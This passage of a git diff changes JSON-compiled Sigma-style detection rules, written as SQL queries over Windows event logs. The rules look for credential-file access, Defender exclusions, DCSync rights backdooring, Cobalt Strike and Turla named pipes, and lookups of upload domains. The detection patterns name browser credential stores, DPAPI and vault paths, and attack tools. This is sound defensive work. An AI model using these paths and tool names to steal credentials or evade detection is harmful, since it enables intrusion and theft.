'%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", + "title": "Windows Defender Exclusion Set", + "id": 
"e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + "Intended inclusions by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 
'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (Image = 'System' AND ParentImage = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location 
that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE 
'\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR 
ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon_high.json b/rules/rules_windows_sysmon_high.json index d099ae7..66d3986 100644 --- a/rules/rules_windows_sysmon_high.json +++ b/rules/rules_windows_sysmon_high.json 
@@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName 
LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR 
PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE 
'\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE 
'\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + 
